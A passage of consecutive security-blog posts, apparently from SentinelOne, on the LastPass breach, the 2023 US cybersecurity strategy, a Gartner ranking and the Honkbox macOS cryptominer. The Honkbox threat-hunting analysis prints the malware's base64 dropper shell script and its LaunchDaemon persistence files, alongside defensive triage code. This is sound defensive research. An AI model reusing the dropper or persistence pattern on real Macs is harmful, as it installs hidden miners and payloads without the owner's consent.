Aside from the increased costs due to the heavy use of electricity that cryptomining infections can cause, it’s also worth noting that in most cases, the miner is a separate stage payload from the dropper or infection vector. That means that while these campaigns may currently be focusing on stealing electricity to mine cryptocurrency, the threat actors could just as easily drop a different, more destructive or profitable payload should they wish. Securing those endpoints against any intrusion is the only safe way to operate.

The Ugly

More hard knocks for password manager LastPass this week after news broke of yet another hack in the wake of an earlier compromise. This time, in a highly-targeted attack, a decrypted LastPass vault was stolen from an employee, giving attackers access to a cloud-storage environment containing encryption keys for customer vault backups.

The attack, which took place between August and October last year, leveraged data stolen in the first attack even before LastPass had completed its initial mitigation.

In a statement, the company revealed that the threat actor targeted one of only four DevOps engineers who had access to the decryption keys needed to access a LastPass cloud storage service. The employee’s home computer was infected with a keylogger that captured the employee’s master password as it was entered after MFA authentication. The compromise was effected by exploiting a vulnerability in an unnamed “third-party media software package”. This afforded the attacker remote code execution capabilities and the opportunity to plant the keylogger.

The attack initially did not raise suspicions, as the login behavior appeared indistinguishable from legitimate activity, but alerts from AWS flagged anomalous behavior when the threat actor tried to use IAM roles to perform unauthorized activity.

Concerned LastPass users can consult the advisory on the company’s blog. For enterprises, the LastPass incident is a timely reminder that the cloud and the shift to work from home has changed the face of enterprise security. Endpoint security should be bolstered with cloud workload protection and identity threat detection to thwart threat actors who are increasingly looking at these surfaces as a means of compromise.

Highlights from the New U.S. Cybersecurity Strategy

The Biden administration today issued its vision for beefing up the nation’s collective cybersecurity posture, including calls for legislation establishing liability for software products and services that are sold with little regard for security. The White House’s new national cybersecurity strategy also envisions a more active role by cloud providers and the U.S. military in disrupting cybercriminal infrastructure, and it names China as the single biggest cyber threat to U.S. interests.

The strategy says the White House will work with Congress and the private sector to develop legislation that would prevent companies from disavowing responsibility for the security of their software products or services.

Coupled with this stick would be a carrot: An as-yet-undefined “safe harbor framework” that would lay out what these companies could do to demonstrate that they are making cybersecurity a central concern of their design and operations.

“Any such legislation should prevent manufacturers and software publishers with market power from fully disclaiming liability by contract, and establish higher standards of care for software in specific high-risk scenarios,” the strategy explains. “To begin to shape standards of care for secure software development, the Administration will drive the development of an adaptable safe harbor framework to shield from liability companies that securely develop and maintain their software products and services.”

Brian Fox, chief technology officer and founder of the software supply chain security firm Sonatype, called the software liability push a landmark moment for the industry.

“Market forces are leading to a race to the bottom in certain industries, while contract law allows software vendors of all kinds to shield themselves from liability,” Fox said. “Regulations for other industries went through a similar transformation, and we saw a positive result — there’s now an expectation of appropriate due care, and accountability for those who fail to comply. Establishing the concept of safe harbors allows the industry to mature incrementally, leveling up security best practices in order to retain a liability shield, versus calling for sweeping reform and unrealistic outcomes as previous regulatory attempts have.”

THE MOST ACTIVE, PERSISTENT THREAT

In 2012 (approximately three national cyber strategies ago), then director of the U.S. National Security Agency (NSA) Keith Alexander made headlines when he remarked that years of successful cyber espionage campaigns from Chinese state-sponsored hackers represented “the greatest transfer of wealth in history.”

The document released today says the People’s Republic of China (PRC) “now presents the broadest, most active, and most persistent threat to both government and private sector networks,” and says China is “the only country with both the intent to reshape the international order and, increasingly, the economic, diplomatic, military, and technological power to do so.”

Many of the U.S. government’s efforts to restrain China’s technology prowess involve ongoing initiatives like the CHIPS Act, a new law signed by President Biden last year that sets aside more than $50 billion to expand U.S.-based semiconductor manufacturing and research and to make the U.S. less dependent on foreign suppliers; the National Artificial Intelligence Initiative; and the National Strategy to Secure 5G.

As the maker of most consumer gizmos with a computer chip inside, China is also the source of an incredible number of low-cost Internet of Things (IoT) devices that are not only poorly secured, but are probably more accurately described as insecure by design.

The Biden administration said it would continue its previously announced plans to develop a system of labeling that could be applied to various IoT products and give consumers some idea of how secure the products may be. But it remains unclear how those labels might apply to products made by companies outside of the United States.

FIGHTING BADNESS IN THE CLOUD

One could convincingly make the case that the world has witnessed yet another historic transfer of wealth and trade secrets over the past decade — in the form of ransomware and data ransom attacks by Russia-based cybercriminal syndicates, as well as Russian intelligence agency operations like the U.S. government-wide SolarWinds compromise.

On the ransomware front, the White House strategy seems to focus heavily on building the capability to disrupt the digital infrastructure used by adversaries that are threatening vital U.S. cyber interests. The document points to the 2021 takedown of the Emotet botnet — a cybercrime machine that was heavily used by multiple Russian ransomware groups — as a model for this activity, but says those disruptive operations need to happen faster and more often.

To that end, the Biden administration says it will expand the capacity of the National Cyber Investigative Joint Task Force (NCIJTF), the primary federal agency for coordinating cyber threat investigations across law enforcement agencies, the intelligence community, and the Department of Defense.

“To increase the volume and speed of these integrated disruption campaigns, the Federal Government must further develop technological and organizational platforms that enable continuous, coordinated operations,” the strategy observes. “The NCIJTF will expand its capacity to coordinate takedown and disruption campaigns with greater speed, scale, and frequency. Similarly, DoD and the Intelligence Community are committed to bringing to bear their full range of complementary authorities to disruption campaigns.”

The strategy anticipates the U.S. government working more closely with cloud and other Internet infrastructure providers to quickly identify malicious use of U.S.-based infrastructure, share reports of malicious use with the government, and make it easier for victims to report abuse of these systems.

“Given the interest of the cybersecurity community and digital infrastructure owners and operators in continuing this approach, we must sustain and expand upon this model so that collaborative disruption operations can be carried out on a continuous basis,” the strategy argues. “Threat specific collaboration should take the form of nimble, temporary cells, comprised of a small number of trusted operators, hosted and supported by a relevant hub. Using virtual collaboration platforms, members of the cell would share information bidirectionally and work rapidly to disrupt adversaries.”

But here, again, there is a carrot-and-stick approach: The administration said it is taking steps to implement Executive Order (EO) 13984, issued by the Trump administration in January 2021, which requires cloud providers to verify the identity of foreign persons using their services.

“All service providers must make reasonable attempts to secure the use of their infrastructure against abuse or other criminal behavior,” the strategy states. “The Administration will prioritize adoption and enforcement of a risk-based approach to cybersecurity across Infrastructure-as-a-Service providers that addresses known methods and indicators of malicious activity including through implementation of EO 13984.”

Ted Schlein, founding partner of the cybersecurity venture capital firm Ballistic Ventures, said how this gets implemented will determine whether it can be effective.

“Adversaries know the NSA, which is the elite portion of the nation’s cyber defense, cannot monitor U.S.-based infrastructure, so they just use U.S.-based cloud infrastructure to perpetrate their attacks,” Schlein said. “We have to fix this. I believe some of this section is a bit pollyannaish, as it assumes a bad actor with a desire to do a bad thing will self-identify themselves, as the major recommendation here is around KYC (‘know your customer’).”

INSURING THE INSURERS

One brief but interesting section of the strategy titled “Explore a Federal Cyber Insurance Backdrop” contemplates the government’s liability and response to a too-big-to-fail scenario or “catastrophic cyber incident.”

“We will explore how the government can stabilize insurance markets against catastrophic risk to drive better cybersecurity practices and to provide market certainty when catastrophic events do occur,” the strategy reads.

When the Bush administration released the first U.S. national cybersecurity strategy 20 years ago after the 9/11 attacks, the popular term for that same scenario was a “digital Pearl Harbor,” and there was a great deal of talk then about how the cyber insurance market would soon help companies shore up their cybersecurity practices.

In the wake of countless ransomware intrusions, many companies now hold cybersecurity insurance to help cover the considerable costs of responding to such intrusions. Leaving aside the question of whether insurance coverage has helped companies improve security, what happens if every one of these companies has to make a claim at the same time?

The notion of a Digital Pearl Harbor incident struck many experts at the time as a hyperbolic justification for expanding the government’s digital surveillance capabilities, and an overstatement of the capabilities of our adversaries. But back in 2003, most of the world’s companies didn’t host their entire business in the cloud.

Today, nobody questions the capabilities, goals and outcomes of dozens of nation-state level cyber adversaries. And these days, a catastrophic cyber incident could be little more than an extended, simultaneous outage at multiple cloud providers.

The full national cybersecurity strategy is available from the White House website (PDF).

The National Cybersecurity Strategy | How the US Government Plans to Protect America

On Thursday, the Biden administration released its long-awaited national cybersecurity strategy, outlining how the US government should approach cybercrime, its own defenses, and the private sector’s responsibility for security over the next several years. The White House says an updated strategy, cohesive across federal agencies, is necessary due to the growing importance of digital services, spurred in part by stay-at-home orders during the Covid-19 pandemic.

At the same time, malicious cyber activity has evolved from a criminal nuisance to a threat to national security, conducted by criminal gangs and nation-states alike. In this post, we explore the details of this plan and how it will protect America’s digital landscape.

Background

The National Cybersecurity Strategy aims to tackle evolving cyber threats and vulnerabilities by creating a unified approach to cybersecurity. The plan seeks to protect the nation’s digital infrastructure from cyber threats by leveraging partnerships with the private sector, other governments, and international organizations to enhance cybersecurity capabilities. More importantly, it sets out to coordinate the diverse resources of the U.S. government so that they ideally operate in lockstep, via their respective authorities and areas of responsibility.

The Current Cybersecurity Landscape

Criminal gangs and nation-states increasingly target US government agencies and critical infrastructure, causing disruption, financial losses, and national security threats. Ransomware attacks, one of the most common types of cyber threats, increased by 300% in 2020, and by 2021 the threat of ransomware had become so severe that CISA and the NSA reported attacks on 14 of the nation’s 16 critical infrastructure sectors. Meanwhile, the DoJ noted that, though they received fewer headlines, 75% of all ransomware attacks were on small businesses, proving that the threat is systemic and affecting society and the economy as a whole.

Phishing, social engineering, and supply chain attacks are increasingly common cyber threats that entail the compromise of sensitive data, theft of login credentials, and loss of system integrity via the introduction of malware, leading to financial loss and reputational damage. Understanding the severity of these threats and developing a comprehensive national cybersecurity strategy that addresses these challenges is essential.

Why Do We Need a National Cybersecurity Strategy?

SentinelOne’s Juan Andres Guerrero-Saade, Senior Director of the company’s threat intelligence and research arm SentinelLabs, explained the necessity and importance of the government’s initiative.

“Security vendors, threat intelligence companies, ISPs, mass distribution platforms, hosting providers, and many other essential services and foundational components seamlessly blend together into what we refer to as the Internet. Each of these stakeholders are attempting to defend their own slice of the proverbial pie. This collective can form a formidable force for good, when empowered to work together with the best intentions. However, there are actions beyond the remit of the private sector, like indictment, prosecutions, and law enforcement activities, victim notifications, and leveraging threat intelligence to protect national infrastructure and critical systems. This is where the government gets to play a clear and necessary role, employing unique authorities and resources.

The National Cybersecurity Strategy sets out a direction to coordinate the alphabet soup of diverse public sector organizations with diverse and overlapping authorities. As we detail below, the strategy is split into five pillars with fairly straightforward intent. We won’t know its practical application until further implementation documents are set down on paper and (importantly) budget is assigned to diverse initiatives and government vessels. That may mean we can’t judge its effectiveness at this time, but it’s worth noting that the stated approach at the heart of this new strategy is one of reshaping market dynamics to incentivize and reward security investment.

There’s a recognition that the free market alone isn’t rewarding security investments and has established a series of dark patterns that perpetuate pervasive and insidious difficulties for user safety. The ethos of the internet is one of radical freedom of information, democratized empowerment, and enabling innovation. But given the current state of our security challenges, even its staunchest supporters would do well to welcome some (well-directed) government intervention in furthering digital safety, shifting liability, and fomenting effective coordination.”

Overview of the National Cybersecurity Strategy

In today’s digital age, cybersecurity is no longer a luxury but a necessity. With every technological advancement, the risks and vulnerabilities to our digital infrastructure continue to increase.

The National Cybersecurity Strategy has five key pillars to safeguard the nation from cyber threats and secure the nation’s critical infrastructure, essential services, and digital ecosystem.

1. Defend Critical Infrastructure

Critical infrastructure provides daily essential services to millions of Americans. The first pillar of the National Cybersecurity Strategy recognizes the importance of protecting this critical infrastructure and outlines a plan to ensure its resilience against cyber threats.

This plan calls for an expansion of minimum cybersecurity requirements in critical sectors, the fostering of public-private collaboration, and modernizing Federal networks and incident response policies.

2. Disrupt and Dismantle Threat Actors

The second pillar aims to effectively combat malicious cyber threats. The United States, the strategy says, must use all instruments of national power to disrupt and dismantle threat actors.

This includes strategically employing all tools of national power, engaging the private sector, and addressing the ransomware threat through a comprehensive Federal approach in lockstep with international partners.

3. Shape Market Forces to Drive Security and Resilience

The digital ecosystem is complex, with various stakeholders responsible for ensuring its security and resilience. The National Cybersecurity Strategy seeks to place responsibility on those within the ecosystem who are best positioned to reduce risk and shift the consequences of poor cybersecurity away from the most vulnerable.

Vital to this effort is promoting privacy and the security of personal data, shifting liability for software products and services, and ensuring that Federal grant programs promote investments in new infrastructure that are secure and resilient.

4. Invest in a Resilient Future

Investing in a resilient future is critical to securing the nation’s digital ecosystem against cyber threats. Investment in cybersecurity has not matched the threats we all face, and both the public and private sectors need to address this investment gap.

The National Cybersecurity Strategy will leverage strategic and public investments in innovation, R&D and education. These aim to ensure U.S. leadership in technology and innovation while at the same time defending the nation’s intellectual property, electoral processes and national defenses against adversaries and malicious actors. The strategy will focus on developing and deploying emerging and innovative technologies for cybersecurity.

5. Forge International Partnerships to Pursue Shared Goals

Geographic boundaries do not limit cyber threats, and nations must understand that they cannot combat them alone. The fifth pillar of the National Cybersecurity Strategy seeks to forge international partnerships with like-minded nations to counter threats to the digital ecosystem through joint preparedness, response, and cost imposition.

In order to defend the United States’ national interests, it is critical to increase the capacity of partners to defend themselves against cyber threats. The strategy calls for closer cooperation with US allies and partners to make secure, reliable, and trustworthy global supply chains.

Conclusion

SentinelOne supports the new National Cybersecurity Strategy because it aims to address the growing threat of cybercrime and cyberattacks on the nation’s digital infrastructure.

The strategy emphasizes the need for a cohesive approach to cybersecurity across federal agencies, partnerships with the private sector, and international collaboration to enhance cybersecurity capabilities. By coordinating the resources of the U.S. government, the strategy aims to create a more effective defense against cyber threats.

SentinelOne recognizes the importance of this approach and is committed to supporting the implementation of the National Cybersecurity Strategy to protect America’s digital landscape.

Customer Value, Innovation, and Platform Approach: Why SentinelOne is a Gartner Magic Quadrant Leader

SentinelOne is a Leader in the 2022 Gartner Magic Quadrant for Endpoint Protection Platforms (EPP) and Ranks Highest Across All Gartner Critical Capabilities Use Cases

The results are in: SentinelOne has once again been recognized as a Leader in Magic Quadrant for Endpoint Protection Platforms and ranks highest across all Gartner Critical Capabilities Use Cases. We believe our strong results and upward trajectory in Gartner’s newly released report reflects SentinelOne’s commitment to providing a best-in-class security platform, user experience, and value to organizations of every size, maturity, and industry. SentinelOne is helping organizations to protect their enterprise endpoints from attacks and breaches.

The Gartner Magic Quadrant evaluates vendors based on their Ability to Execute and their Completeness of Vision, while the Critical Capabilities report evaluates vendors based on specific capabilities that Gartner believes are important for the market. We look forward to sharing results from the report and a more in-depth analysis of what our performance means for our customers in the coming days. Today, we’d like to reflect on what this recognition tells organizations about SentinelOne.

1. Customer Value Drives Our Mission

In our hyper-connected world, operating safely and effectively has become a top priority for all organizations. Security leaders face unique challenges on the digital battleground, having to contend with regulatory requirements and put up the right defenses to stay steps ahead in an ever-evolving threat landscape. To support our customers, SentinelOne’s offerings encompass all core surfaces of a digital enterprise, including endpoint, cloud, and identity, to deliver operational value and the highest level of protection.

Endpoints reside at the heart of all organizations today. As organizations continue to scale up, many work environments increasingly put the onus on the integrity of the endpoint itself. SentinelOne’s XDR platform eliminates the risk at the endpoint level by providing superior visibility and enterprise-grade prevention, detection, and response.

Identity-based attacks continue to rise with threat actors weaponizing legitimate tools and software known to and used by their victims as their lure. Exploiting human behaviors and user trust, attackers are casting a wider net through sophisticated spoof websites and elaborate phishing campaigns. SentinelOne’s Singularity Identity deflects identity-based attacks by detecting in-progress attacks and obstructing the actor’s progress before they can escalate privileges.

Cloud services boost organizational collaboration, scalability, and efficiency. However, cloud environments require businesses to secure virtual machines, containers, serverless workloads, and Kubernetes – all of which could be leveraged by opportunistic attackers. To combat common cloud-based threats including misconfigurations, insider threats, and supply chain attacks, SentinelOne’s Singularity for Cloud prevents, detects, and investigates threats in real-time without interruption to cloud workloads.

Our mission is to be a force for good and ultimately enable our customers to achieve organizational cyber resilience by reducing risks and increasing security teams’ efficiency. To accomplish that goal, SentinelOne leverages AI-powered technology to deliver machine-speed cybersecurity across our customers’ entire infrastructure. We combine best-in-class prevention, detection, and response capabilities in a single platform to defend faster, at greater scale, and with higher accuracy across all attack surfaces. SentinelOne proactively creates value for our customers, focusing on improving the return on investment by providing powerful solutions for every step of the threat lifecycle.

2. SentinelOne Innovates Beyond The Endpoint

SentinelOne has evolved significantly in the past decade, and our performance in the Gartner reports released today reflects that.

In recent years, the exponential increase in machine and user identities has accelerated threat actors’ attention on the identity surface. Security leaders protecting their identity surface from compromise are now looking beyond traditional identity management frameworks like Identity and Access Management (IAM) and Privileged Access Management (PAM). While conventional tools and frameworks focus on giving users the access they need at the endpoint level, Identity Threat Detection and Response (ITDR) platforms secure the infrastructure that houses vulnerable identities and assess security gaps from an identity standpoint. SentinelOne provides the critical visibility needed to prevent common identity-based attacks from taking root in the first place.

With the acquisition of Scalyr in 2021, SentinelOne introduced its Security Data Lake, which today powers all Singularity platform customers and offers security data ingestion at scale. Furthermore, with the acquisition of Attivo Networks in 2022, SentinelOne expanded its Extended Detection and Response (XDR) platform even further and today provides best-in-class security across endpoint, cloud workloads, and identity. SentinelOne customers can rely on threat analysis and mitigation beyond the endpoint and across the entire enterprise and cloud attack surface.

3. A Unified Platform Enabling Customer Leadership

In addition to SentinelOne’s repeat recognition as a Leader in the Gartner Magic Quadrant for Endpoint Protection Platforms, we also received on Gartner Peer Insights™ a 4.8 rating as of 1st March 2023 and a 96% recommendation in the Endpoint Protection Platform and Endpoint Detection and Response categories.

SentinelOne has also achieved a leading performance in MITRE Engenuity Enterprise ATT&CK Evaluations three years running, as well as results in the top of the pack for MITRE’s Deception and Managed Security Services ATT&CK Evaluations.

With threat adversaries moving faster than ever before, our customers rely on SentinelOne to empower them with autonomous, real-time action, richer data, and smarter workflows. Our platform uses the power of static and behavioral AI so customers can confidently build up a stronger, long-term security posture. Our unified Singularity XDR platform is the only cybersecurity platform designed with security analysts in mind, allowing modern enterprises to confidently take action against cyber threats and safeguard their entire attack surface.

SentinelOne’s Commitment To Our Customers

Our performance excellence, along with our laser focus on customer outcomes, is why 97% of our customers stay with us and invest in growing their cybersecurity programs with us. We are seeing more and more customers who come to us for endpoint protection evolve their strategies with the adoption of our Cloud, Identity, Attack Surface Management, Security Data Analytics, MDR, and Incident Response modules.

Join us Wednesday, March 8th, 2023, at 8:00 AM PST / 11 AM EST for a webinar to learn more about this milestone. You will also hear from our customers about why they chose SentinelOne and how they leveraged the Gartner Magic Quadrant and MITRE ATT&CK Evaluations to identify SentinelOne as their trusted cybersecurity technology partner.

Webinar | SentinelOne Once Again a Magic Quadrant Leader
Hear from customers how SentinelOne helps them reduce cyber risk and increases cyber resilience.

Wednesday, March 8 at 8:00 AM PST / 11:00 AM EST.

GARTNER is a registered trademark and service mark of Gartner and Magic Quadrant and Peer Insights are a registered trademark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and are used herein with permission. All rights reserved.

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, express or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

Gartner Peer Insights content consists of the opinions of individual end users based on their own experiences, and should not be construed as statements of fact, nor do they represent the views of Gartner or its affiliates. Gartner does not endorse any vendor, product or service depicted in this content nor makes any warranties, expressed or implied, with respect to this content, about its accuracy or completeness, including any warranties of merchantability or fitness for a particular purpose.

Gartner Magic Quadrant for Endpoint Protection Platforms, Peter Firstbrook, Chris Silva, 31 December 2022

Hunting for Honkbox | Multistage macOS Cryptominer May Still Be Hiding

For the first time since November 2022, Apple last week released an update to its internal YARA-based malware file blocking service, XProtect. Version 2166 added several new signatures for a threat it labels “Honkbox”, a cryptominer characterized by its leverage of XMRig and the “Invisible Internet Project” (aka I2P). Apple’s update comes on the back of new research from Jamf, which itself builds on earlier research from other sources.

Honkbox is an active threat with at least three variants and multiple components, some of which have not been previously documented. In this post, we describe Honkbox from a threat hunter’s point of view, providing a comprehensive breakdown of file characteristics, unique behavior and sample hashes that analysts and SOC teams can ingest to further aid their detection and response.

Honkbox Cryptominer Background

Apple updated XProtect last week in light of a publication by researchers at Jamf describing a known but relatively undocumented macOS malware.

The new signatures departed from Apple’s recent practice and used human-readable malware names instead of their usual short base 16 strings. Apple’s YARA rules dubbed the malware ‘Honkbox’ (aka HONKBOX, but we’ll spare your eyes).

XProtect update v2166 includes three signatures for Honkbox

Honkbox is a multistage cryptominer with three identified variants that make novel use of the I2P project. The malware has been distributed on the PirateBay in cracked apps for at least three years by user wtfisthat34698409672. Many of the samples originate from trojanized versions of Logic Pro, but other popular creative applications have been abused including Adobe Zii, Photoshop, Illustrator and Ableton Live.

Honkbox has been circulating since at least 2019 and was likely first spotted in the wild by a reddit user questioning why what appeared to be Apple software was tripping over the macOS firewall.

As the research by Jamf and previously by Trend Micro on one of the earlier variants described, com.apple.acc.network is in fact a masquerade for the I2P command line tool.

I2P used by the Honkbox macOS malware

Honkbox is the first known macOS malware to make use of I2P, which in effect functions as an alternative to the better known TOR/Onion router for hiding internet traffic and content. I2P describes itself as “a fully encrypted private network layer [that] protects your activity and location…No one can see where traffic is coming from, where it is going, or what the contents are.”

Traffic inside I2P doesn’t interact with the Internet directly and uses encrypted unidirectional tunnels between anonymous peers. It’s this tunnel traffic that tripped the macOS application firewall reported by the reddit user.

Despite being known to researchers for some time, the recent variants of Honkbox seem to have managed to fly under the radar with a number of samples having low reputation scores on VirusTotal. According to Jamf’s report, the samples they tested also evaded Apple’s built-in security mechanisms.

Some Honkbox variants remain unknown to VirusTotal reputation engines

That situation was corrected last week with the v2166 update to XProtect, which added three signatures Apple labeled “HONKBOX_A”, “HONKBOX_B”, and “HONKBOX_C”.

Honkbox | Distinctive File Characteristics

In radare2 and with YARA installed, we can see if a file under analysis is known to XProtect with the following command:

!yara -w /Library/Apple/System/Library/CoreServices/XProtect.bundle/Contents/Resources/XProtect.yara `i~file~0[1]`

Taking a sample each of Honkbox_A, _B and _C and using custom power-ups to invoke XProtect and search for IP address regexes, we can observe that the strings related to the localhost address are hard coded in the binary. However, the number of occurrences changes in each variant: four times in A, five in B and three in Honkbox_C.

Localhost ports hard coded in the Honkbox variants

In addition, variants A and B share in common the use of port 4546, whereas variants B and C share in common the use of ports 4545 and 4543.

A typo that occurs only in variant B misspells the string “Continue process” as “Constinue process”.

A characteristic seen in Honkbox_B variants is the typo “Constinue process”

Honkbox_A also hard codes a number of I2P-related URLs. These are not seen in variants B and C.

A characteristic of Honkbox_A is the hard coded “reseed” and other URLs

Perhaps the most distinctive file characteristic of the newer Honkbox variants is the many 2044-byte _cstrings that together constitute the encrypted blob the malware uses to write and execute a working copy of the cracked software that the victim downloaded, along with other components of the malware itself.

The samples of Honkbox_B we analyzed had upwards of 16,000 individual 2044 byte _cstrings embedded in the binaries. All of these were base64-encoded data, save for the last one, which is the plain text execution script passed to the shell via the system() command.

Honkbox_B embeds thousands of individual 2044-byte strings

Our sample of Honkbox_C, on the other hand, contained a comparatively smaller number of these strings, just over 650.

Honkbox_C has over 650 2044-byte base64-encoded _cstrings

The amount of data embedded depends on what “cracked” software the user was lured into downloading.

Honkbox_A does not use an embedded data blob but rather sources the software from the DMG downloaded by the victim.

Honkbox_A sources the cracked software from its parent disk image
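The file characteristics above (hard-coded localhost ports, the 2044-byte base64 chunks, the variant-B typo and the variant-A reseed URLs) are all plain strings, so a hunter can triage a sample without radare2. The script below is an added example, not SentinelOne tooling or code from the post: it pulls NUL-terminated C strings out of an image, counts the markers, and maps them to a variant with the heuristic the post describes. The two samples at the bottom are constructed byte strings (a Mach-O magic followed by strings), not real malware, and the chunk count of 3 is just for the demo.

```python
"""Static triage for the Honkbox file characteristics described in the post.

Added example (not SentinelOne tooling). Reports hard-coded 127.0.0.1:<port>
strings, 2044-byte base64 chunks of the embedded blob, the variant-B
"Constinue process" typo and variant-A I2P reseed URLs. SAMPLE_A / SAMPLE_B
are constructed, not real samples.
"""
import base64
import binascii
import re
from collections import Counter

CSTRING_RE = re.compile(rb"[\x20-\x7e]{4,}(?=\x00)")   # printable run ending in NUL
LOCALHOST_RE = re.compile(rb"127\.0\.0\.1:(\d{2,5})")
BLOB_CHUNK_LEN = 2044          # chunk size reported for Honkbox_B / _C
TYPO = b"Constinue process"    # seen in variant B only


def cstrings(data: bytes) -> list:
    return [m.group(0) for m in CSTRING_RE.finditer(data)]


def is_base64(s: bytes) -> bool:
    try:
        base64.b64decode(s, validate=True)
        return True
    except (binascii.Error, ValueError):
        return False


def classify(r: dict) -> str:
    """Heuristic mapping of the markers to the variants as the post describes them."""
    if r["i2p_urls"] and r["blob_chunks"] == 0:
        return "Honkbox_A (heuristic)"          # URLs hard coded, no embedded blob
    if r["constinue_typo"]:
        return "Honkbox_B (heuristic)"          # typo is unique to B
    if r["blob_chunks"] and 4546 not in r["localhost_ports"]:
        return "Honkbox_C (heuristic)"          # blob present, 4546 only in A and B
    return "inconclusive"


def triage(data: bytes) -> dict:
    strs = cstrings(data)
    ports = Counter(int(p) for p in LOCALHOST_RE.findall(data))
    blob_chunks = sum(1 for s in strs if len(s) == BLOB_CHUNK_LEN and is_base64(s))
    urls = sorted({s.decode() for s in strs
                   if s.startswith(b"https://") and (b"reseed" in s or b"i2p" in s)})
    result = {
        "localhost_ports": dict(ports),   # port -> number of occurrences
        "blob_chunks": blob_chunks,
        "constinue_typo": TYPO in data,
        "i2p_urls": urls,
    }
    result["variant"] = classify(result)
    return result


# ---- constructed samples: Mach-O magic plus strings, no real payload ----
def _cstr(s: bytes) -> bytes:
    return s + b"\x00"


def _blob_chunk(seed: int) -> bytes:
    raw = bytes((i + seed) & 0xFF for i in range(1533))   # 1533 bytes -> 2044 base64 chars, no padding
    return base64.b64encode(raw)


MAGIC = b"\xcf\xfa\xed\xfe" + b"\x00" * 12

SAMPLE_B = MAGIC + b"".join(_cstr(s) for s in [
    b"127.0.0.1:4546", b"127.0.0.1:4545", b"127.0.0.1:4543", TYPO,
    _blob_chunk(0), _blob_chunk(1), _blob_chunk(2),
    b'SCRIPTPATH=$( cd -- "$(dirname "$0")/.." >/dev/null 2>&1 ; pwd -P );',
])

SAMPLE_A = MAGIC + b"".join(_cstr(s) for s in [
    b"127.0.0.1:4546", b"Continue process",
    b"https://reseed.i2pgit.org/", b"https://reseed.memcpy.io/",
])

if __name__ == "__main__":
    import json
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_B
    print(json.dumps(triage(data), indent=2))
```

Run it against a suspect Mach-O with `python3 triage.py <file>`; the port occurrence counts it reports are the same figures the post derives with radare2 (four in A, five in B, three in C), so they can be compared directly. The variant label is a heuristic built only from the markers the post lists and should be confirmed against the XProtect rules or the hashes below.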

Honkbox | Distinctive Execution Behavior

Understanding the execution behavior of Honkbox is made relatively simple for the analyst as it is largely laid out in plain text strings in the binaries themselves.

Honkbox variants lack obfuscation

As we shall see in the next section, the authors have taken multiple steps to evade detection on and during execution, but they have paid no heed to obfuscating or thwarting static analysis by researchers. Given the length of time that Honkbox has been successful and relatively invisible, perhaps this was deemed unnecessary by the authors. That could well change in future in light of the recent flurry of interest.

As Honkbox_A execution was well-covered in previous research, here we will restrict our discussion to points useful for analysts and threat hunters.

Honkbox_B spawns a number of processes that ultimately pass the following script to the shell.

SCRIPTPATH=$( cd -- "$(dirname "x00")/.." >/dev/null 2>&1 ; pwd -P );
BLOB_PATH="/tmp/._x00";
IMG_SP_PATH="/tmp/._x00";
[ -f "$IMG_SP_PATH" ] && rm -rf "$IMG_SP_PATH";
[ -d "$IMG_SP_PATH" ] && rm -rf "$IMG_SP_PATH";
TMPDIR="$IMG_SP_PATH/x00.app/Contents";
mkdir -p "$TMPDIR";
( find "$SCRIPTPATH" -type d -mindepth 1 -maxdepth 1 -exec ln -s ../ {} "$TMPDIR" ; ) > /dev/null 2>&1;
rm -rf "$TMPDIR/MacOS";
mkdir "$TMPDIR/MacOS";
(find "$SCRIPTPATH" -type f -maxdepth 1 -exec cp {} "$TMPDIR" ;) > /dev/null 2>&1;
(find "$SCRIPTPATH/MacOS" -type f -mindepth 1 -maxdepth 1 -exec ln -s ../ {} "$TMPDIR/MacOS" ;) > /dev/null 2>&1;
APP_MACH="$TMPDIR/MacOS/x00";
rm -rf "$APP_MACH";
CT=$(mktemp /tmp/._XXXXXXXX);
cat "$BLOB_PATH" | base64 -o "$CT" -d;
tar -xf "$CT" -O >"$APP_MACH";
rm -rf "$CT";
rm -rf "$BLOB_PATH";
chmod +x "$APP_MACH";

Aside from cleaning up any previous installation, the script essentially writes the 2044-byte base64-encoded strings mentioned earlier to file in a subfolder in the /tmp/ directory, unpacks the data, then gives it executable permissions. This file is subsequently launched and appears to the user as the cracked software they intended to run.

Meanwhile, two further processes which masquerade as mdworker_local and mdworker_shared or mdworker_watchd in Honkbox_C serve to run the XMRig miner and the I2P daemon, respectively. We discuss these further below.

The I2P tunnel uses a config folder located either at ~/.i2pd/tunnels.d or /var/lib/i2pd/tunnel.d.

Honkbox I2P tunnels config path

Honkbox | Persistence and Evasion Techniques

Honkbox_A drops a property list file in the LaunchDaemons folder if running with privileges and targets an executable in /usr/local/bin. The name of the launch daemon varies depending on the software being masqueraded. In our sample, which presented a working copy of Ableton Live to the target, a privileged process executing from /tmp/lauth writes the following LaunchDaemon:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
  <dict>
    <key>Label</key>
      <string>com.ableton.LiveEventd</string>
    <key>ProgramArguments</key>
      <array>
        <string>/usr/local/bin/liveeventd.sh</string>
      </array>
    <key>RunAtLoad</key>
      <true/>
    <key>LaunchOnlyOnce</key>
      <true/>
  </dict>
</plist>
It then writes the targeted liveeventd.sh script into /usr/local/bin.

#!/bin/bash
sleep 60s
/usr/local/bin/liveeventd &
/usr/local/bin/livelocalserviced

The two Mach-O binaries that the script itself targets are also written by lauth.
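The persistence pattern above is easy to audit: a RunAtLoad daemon whose program sits in a user-writable location, a daemon whose target is a shell script rather than a signed binary, and (for the com.apple.acc.installer.v1 indicator listed at the end of the post) an Apple-style label whose program lives outside Apple's system directories. The auditor below is an added example, not code from the post; the three plists at the bottom are constructed after the one shown, with their boolean values assumed, and the suspect and Apple directory lists are our own choices.

```python
"""Audit LaunchDaemon plists for the Honkbox_A persistence pattern.

Added example, not code from the post. Flags: a RunAtLoad daemon executing
from a user-writable path, a daemon whose target is a shell script, and a
com.apple.* label whose program is outside Apple's system paths. The sample
plists are constructed; SUSPECT_DIRS / APPLE_DIRS are assumptions.
"""
import os
import plistlib

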